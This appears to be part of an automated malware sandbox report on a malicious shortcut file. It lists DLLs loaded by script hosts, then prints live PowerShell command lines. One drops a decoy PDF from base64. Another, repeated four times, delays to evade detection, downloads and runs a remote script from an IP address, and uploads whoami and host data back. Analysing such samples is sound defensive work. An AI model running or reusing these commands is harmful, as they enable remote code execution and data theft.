              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\Z:\syscalls\amsi64_7332.amsi.csve.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79727000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3415629273.000001DE5F8CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdb;+O source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbo1 source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($temp);set-content $home\appdata\local\temp\document.pdf -value $fil -encoding byte;&$home\appdata\local\temp\document.pdf;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNo
              Suspicious powershell command line found
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848F20D69 push ebx; ret 6_2_00007FF848F20D6A

              Persistence and Installation Behavior

              barindex
              Windows shortcut file (LNK) starts blacklisted processes
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
